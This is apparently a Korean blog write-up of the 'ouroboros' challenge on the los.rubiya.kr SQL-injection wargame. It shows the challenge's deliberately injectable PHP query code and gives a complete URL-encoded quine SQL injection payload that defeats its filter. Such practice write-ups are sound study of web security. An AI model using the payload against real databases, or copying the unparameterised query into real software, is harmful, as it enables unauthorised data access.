일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | |||||
3 | 4 | 5 | 6 | 7 | 8 | 9 |
10 | 11 | 12 | 13 | 14 | 15 | 16 |
17 | 18 | 19 | 20 | 21 | 22 | 23 |
24 | 25 | 26 | 27 | 28 | 29 | 30 |
- react
- Database
- PyAmdecoder
- frontend
- spring
- ㅁㅇㅂ??ㅇㅈㄷ ㅎㅇㅌ...
- 정보보호병 후기
- 네이버 인턴
- mysql
- JSTL
- webhacking 처음
- 소프트웨어 개발보안 경진대회
- EER
- 메모리 포랜식
- jsp
- Forensic 절차
- Layered Architecture
- reversing.kr
- 행정지역 DB
- SessionAttribute
- DBMS
- Django
- 소개딩
- 3단계 지역 DB
- riceteacatpanda
- 방명록 만들기
- restapi
- 동읍면 DB
- 인턴 지원
- 인턴 후기
- Today
- Total
웹찢남
ouroboros-writeup 본문
<?php
include "./config.php";
login_chk();
$db = dbconnect();
if(preg_match('/prob|_|\.|rollup|join|@/i', $_GET['pw'])) exit("No Hack ~_~");
$query = "select pw from prob_ouroboros where pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysqli_fetch_array(mysqli_query($db,$query));
if($result['pw']) echo "<h2>Pw : {$result[pw]}</h2>";
if(($result['pw']) && ($result['pw'] === $_GET['pw'])) solve("ouroboros");
highlight_file(__FILE__);
?>
pw에 like구문을 사용하고 이것 저것 해봐도 값이 안나왔다...
테이블에 값이 없다고 판단하고 소스코드를 보니 답이 없다 생각해서 삽질을 많이 했다
결국 지난 문제처럼 인터넷에 검색해본 결과 처음 본 코드를 발견했다.
https://blog.rwx.kr/quine-sql-injection/
https://los.rubiya.kr/chall/ouroboros_e3f483f087c922c84373b49950c212a9.php?pw=1%27%20union%20SELECT%20REPLACE(REPLACE(%271%22%20union%20SELECT%20REPLACE(REPLACE(%22$%22,CHAR(34),CHAR(39)),CHAR(36),%22$%22)%20AS%20Quine%23%27,CHAR(34),CHAR(39)),CHAR(36),%271%22%20union%20SELECT%20REPLACE(REPLACE(%22$%22,CHAR(34),CHAR(39)),CHAR(36),%22$%22)%20AS%20Quine%23%27)%20AS%20Quine%23
이런 문제가 계속되면 스스로는 못풀것 같다..ㅠㅠ
열심히 공부해야겠다. 매~~우 찝찝하지만 CLEAR!!
'WEB_HACKING > los.rubiya.kr' 카테고리의 다른 글
Alien-writeup (0) | 2020.01.30 |
---|---|
Zombie-writeup (0) | 2020.01.30 |
phantom-writeup (0) | 2020.01.29 |
frankenstein-writeup (0) | 2020.01.29 |
blue_dragon-writeup (0) | 2020.01.29 |